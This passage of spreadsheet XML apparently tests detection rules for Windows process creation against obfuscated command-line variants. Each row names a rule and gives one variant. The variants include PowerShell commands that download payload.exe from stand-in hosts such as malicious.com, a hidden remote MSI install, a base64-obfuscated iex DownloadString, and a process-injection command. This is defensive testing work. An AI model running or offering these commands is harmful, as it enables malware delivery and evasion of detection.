      <c r="E869" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmANd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F869" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G869" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H869" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I869" s="43" t="n"/>
      <c r="J869" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K869" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="870" ht="15.75" customHeight="1" s="42">
      <c r="A870" s="43" t="n"/>
      <c r="B870" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C870" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D870" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E870" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F870" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G870" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H870" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I870" s="43" t="n"/>
      <c r="J870" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K870" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="871" ht="15.75" customHeight="1" s="42">
      <c r="A871" s="43" t="n"/>
      <c r="B871" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C871" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D871" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E871" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F871" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G871" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H871" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I871" s="43" t="n"/>
      <c r="J871" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K871" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="872" ht="15.75" customHeight="1" s="42">
      <c r="A872" s="43" t="n"/>
      <c r="B872" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C872" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D872" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E872" s="4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872" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G872" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H872" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I872" s="43" t="n"/>
      <c r="J872" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K872" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="873" ht="15.75" customHeight="1" s="42">
      <c r="A873" s="43" t="n"/>
      <c r="B873" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C873" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D873" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E873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873" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G873" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H873" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I873" s="44" t="n"/>
      <c r="J873" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K873" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="874" ht="15.75" customHeight="1" s="42">
      <c r="A874" s="43" t="n"/>
      <c r="B874" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C874" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D874" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E874" s="4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874" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G874" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H874" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I874" s="43" t="n"/>
      <c r="J874" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K874" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="875" ht="15.75" customHeight="1" s="42">
      <c r="A875" s="43" t="n"/>
      <c r="B875" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C875" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D875" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E875" s="4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875" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G875" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H875" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I875" s="43" t="n"/>
      <c r="J875" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K875" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="876" ht="15.75" customHeight="1" s="42">
      <c r="A876" s="43" t="n"/>
      <c r="B876" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C876" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D876" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E876" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"W" Hidden -"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F876" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G876" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H876" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I876" s="43" t="n"/>
      <c r="J876" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K876" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="877" ht="15.75" customHeight="1" s="42">
      <c r="A877" s="43" t="n"/>
      <c r="B877" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C877" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D877" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E877" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F877" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G877" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H877" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I877" s="44" t="n"/>
      <c r="J877" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K877" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="878" ht="15.75" customHeight="1" s="42">
      <c r="A878" s="43" t="n"/>
      <c r="B878" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C878" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D878" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E878" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden /"C" "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F878" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G878" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H878" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I878" s="44" t="n"/>
      <c r="J878" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K878" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="879" ht="15.75" customHeight="1" s="42">
      <c r="A879" s="43" t="n"/>
      <c r="B879" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C879" s="44" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D879" s="44" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E879" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(New-Object System.Net.WebClient).DownloadFile('http://example.com/test.dll', 'C:\temp\test.dll')"</t>
        </is>
      </c>
      <c r="F879" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G879" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H879" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I879" s="44" t="n"/>
      <c r="J879" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K879" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="880" ht="15.75" customHeight="1" s="42">
      <c r="A880" s="43" t="n"/>
      <c r="B880" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C880" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D880" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E880" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F880" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G880" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H880" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I880" s="43" t="n"/>
      <c r="J880" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K880" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="881" ht="15.75" customHeight="1" s="42">
      <c r="A881" s="43" t="n"/>
      <c r="B881" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C881" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D881" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E881" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F881" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G881" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H881" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I881" s="43" t="n"/>
      <c r="J881" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K881" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="882" ht="15.75" customHeight="1" s="42">
      <c r="A882" s="43" t="n"/>
      <c r="B882" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C882" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D882" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E882" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F882" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G882" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H882" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I882" s="43" t="n"/>
      <c r="J882" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K882" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="883" ht="15.75" customHeight="1" s="42">
      <c r="A883" s="43" t="n"/>
      <c r="B883" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C883" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D883" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E883" s="44" t="inlineStr">
        <is>
          <t>powershell -"c" "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F883" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G883" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H883" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I883" s="44" t="n"/>
      <c r="J883" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K883" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="884" ht="15.75" customHeight="1" s="42">
      <c r="A884" s="43" t="n"/>
      <c r="B884" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C884" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D884" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E884" s="44" t="inlineStr">
        <is>
          <t>powershell /"c" "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F884" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G884" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H884" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I884" s="44" t="n"/>
      <c r="J884" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K884" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="885" ht="15.75" customHeight="1" s="42">
      <c r="A885" s="43" t="n"/>
      <c r="B885" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C885" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D885" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E885" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F885" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G885" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H885" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I885" s="43" t="n"/>
      <c r="J885" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K885" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="886" ht="15.75" customHeight="1" s="42">
      <c r="A886" s="44" t="n"/>
      <c r="B886" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C886" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D886" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E886" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F886" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G886" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H886" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I886" s="43" t="n"/>
      <c r="J886" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K886" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="887" ht="15.75" customHeight="1" s="42">
      <c r="A887" s="44" t="n"/>
      <c r="B887" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C887" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D887" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E887" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F887" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G887" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H887" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I887" s="43" t="n"/>
      <c r="J887" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K887" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="888" ht="15.75" customHeight="1" s="42">
      <c r="A888" s="44" t="n"/>
      <c r="B888" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C888" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D888" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E888" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\Temp\t^mp.bat"</t>
        </is>
      </c>
      <c r="F888" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G888" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H888" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I888" s="43" t="n"/>
      <c r="J888" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K888" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="889" ht="15.75" customHeight="1" s="42">
      <c r="A889" s="44" t="n"/>
      <c r="B889" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C889" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D889" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E889" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F889" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G889" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H889" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I889" s="44" t="n"/>
      <c r="J889" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K889" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="890" ht="15.75" customHeight="1" s="42">
      <c r="A890" s="44" t="n"/>
      <c r="B890" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C890" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D890" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E890" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F890" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G890" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H890" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I890" s="44" t="n"/>
      <c r="J890" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K890" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="891" ht="15.75" customHeight="1" s="42">
      <c r="A891" s="43" t="n"/>
      <c r="B891" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C891" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D891" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E891" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F891" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G891" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H891" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I891" s="43" t="n"/>
      <c r="J891" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K891" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="892" ht="15.75" customHeight="1" s="42">
      <c r="A892" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B892" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_inline_win_api_access</t>
        </is>
      </c>
      <c r="C892" s="44" t="inlineStr">
        <is>
          <t>Potential WinAPI Calls Via CommandLine</t>
        </is>
      </c>
      <c r="D892" s="44" t="inlineStr">
        <is>
          <t>ba3f5c1b-6272-4119-9dbd-0bc8d21c2702</t>
        </is>
      </c>
      <c r="E892" s="44" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; { $p = Start-Process C:\Windows\System32\werfault.exe -passthru; &amp; "C:\AtomicRedTeam\atomics\T1055\bin\x64\Create""Remote""Thread.exe" -pid $p.Id -debug }</t>
        </is>
      </c>
      <c r="F892" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G892" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H892" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I892" s="44" t="n"/>
      <c r="J892" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K892" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="893" ht="15.75" customHeight="1" s="42">
      <c r="A893" s="44" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B893" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_inline_win_api_access</t>
        </is>
      </c>
      <c r="C893" s="44" t="inlineStr">
        <is>
          <t>Potential WinAPI Calls Via CommandLine</t>
        </is>
      </c>
      <c r="D893" s="44" t="inlineStr">
        <is>
          <t>ba3f5c1b-6272-4119-9dbd-0bc8d21c2702</t>
        </is>
      </c>
      <c r="E893" s="44" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$h = [System.Convert]::FromBase64String('aGVsbG8='); iex(New-Object Net.WebClient).DownloadString([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1MzY3VyM1RoMXNTaDF0L0dldC1TeXN0ZW0tVGVjaG5pcXVlcy9tYXN0ZXIvVXNvRExML0dldC1Vc29DbGllbnRETExTeXN0ZW0uYHMx')))}</t>
        </is>
      </c>
      <c r="F893" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G893" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H893" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I893" s="44" t="n"/>
      <c r="J893" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K893" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="894" ht="15.75" customHeight="1" s="42">
      <c r="A894" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B894" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C894" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D894" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E894" s="44" t="inlineStr">
        <is>
          <t>powershell -Nop -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F894" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G894" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H894" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I894" s="44" t="n"/>
      <c r="J894" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K894" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="895" ht="15.75" customHeight="1" s="42">
      <c r="A895" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B895" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C895" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D895" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E895" s="44" t="inlineStr">
        <is>
          <t>powershell /"nop" -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F895" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G895" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H895" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I895" s="44" t="n"/>
      <c r="J895" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K895" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="896" ht="15.75" customHeight="1" s="42">
      <c r="A896" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B896" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C896" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D896" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E896" s="44" t="inlineStr">
        <is>
          <t>powershell -"nop" -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F896" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G896" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H896" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I896" s="44" t="n"/>
      <c r="J896" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K896" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="897" ht="15.75" customHeight="1" s="42">
      <c r="A897" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B897" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_snapins_hafnium</t>
        </is>
      </c>
      <c r="C897" s="44" t="inlineStr">
        <is>
          <t>Exchange PowerShell Snap-Ins Usage</t>
        </is>
      </c>
      <c r="D897" s="44" t="inlineStr">
        <is>
          <t>25676e10-2121-446e-80a4-71ff8506af47</t>
        </is>
      </c>
      <c r="E897" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" QQBkAGQALQBQAFMAUwBuAGEAcABpAG4AIABNAGkAYwByAG8AcwBvAGYAdAAuAEUAeABjAGgAYQBuAGcAZQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUwBuAGEAcABJAG4A</t>
        </is>
      </c>
      <c r="F897" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G897" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H897" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I897" s="43" t="n"/>
